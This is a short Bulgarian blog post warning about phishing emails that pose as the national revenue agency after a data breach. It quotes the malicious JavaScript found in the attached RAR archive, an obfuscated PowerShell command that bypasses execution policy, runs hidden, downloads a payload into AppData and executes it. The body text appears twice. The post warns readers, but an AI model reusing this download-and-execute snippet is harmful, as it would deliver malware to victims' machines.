Постинг
07.10.2016 22:24 -
Поредния пробив в базата на НАП
Тъй като не гледам телевизия, не разбрах своевременно, че е имало пробив тези дни в системата на НАП и са били изтеглени данни на респондентите, та ми се наложи на практика да се запозная със случая.
Въпросните хакери след като за изтеглили електронните адреси, изпращат към тях писма със заглавие "Уведомление относно промени в регламента за подаване на декларации към НАП" и подател Национална агенция за приходите
В писмото има прикачен файл известие_432439.rar, което разбира се съдържа Windows scripting host зловреден код. Дано всички счетоводители да гледат телевизия и да са спокойни, когато са получили писмото.
Аз лично като видях .js файла в RAR архива си помислих, че вероятно ще тегли софтуер от НАП. Чак като се зачетох вътре и видях "var soghax = WScript.CreateObject("WScRIPt.SHEll"); if (typeof scyqwy() == "number") { var zexofhimq = "CMd.Exe /c " + mhymukod + " -eXecu^TIo^N^poli^cy^ BYpasS -N^o^prOfi^lE^ -w^indOW^s^tyLe ^h^iDDen^ (NEW^-ObJEcT ^S^y^STEM^.N^et^.w^e^b^cl^Ien^T).^do^wn^lOADfile(^"" + zxytu + "c.bin" + "","%ApPdaTa%.EXE");sTaRT-pR^o^CE^s^S "%AppdATA%.eXe""; "
разбрах, че нещо не е наред...
Въпросните хакери след като за изтеглили електронните адреси, изпращат към тях писма със заглавие "Уведомление относно промени в регламента за подаване на декларации към НАП" и подател Национална агенция за приходите
В писмото има прикачен файл известие_432439.rar, което разбира се съдържа Windows scripting host зловреден код. Дано всички счетоводители да гледат телевизия и да са спокойни, когато са получили писмото.
Аз лично като видях .js файла в RAR архива си помислих, че вероятно ще тегли софтуер от НАП. Чак като се зачетох вътре и видях "var soghax = WScript.CreateObject("WScRIPt.SHEll"); if (typeof scyqwy() == "number") { var zexofhimq = "CMd.Exe /c " + mhymukod + " -eXecu^TIo^N^poli^cy^ BYpasS -N^o^prOfi^lE^ -w^indOW^s^tyLe ^h^iDDen^ (NEW^-ObJEcT ^S^y^STEM^.N^et^.w^e^b^cl^Ien^T).^do^wn^lOADfile(^"" + zxytu + "c.bin" + "","%ApPdaTa%.EXE");sTaRT-pR^o^CE^s^S "%AppdATA%.eXe""; "
разбрах, че нещо не е наред...
Няма коментари
Търсене
За този блог
Гласове: 74
Блогрол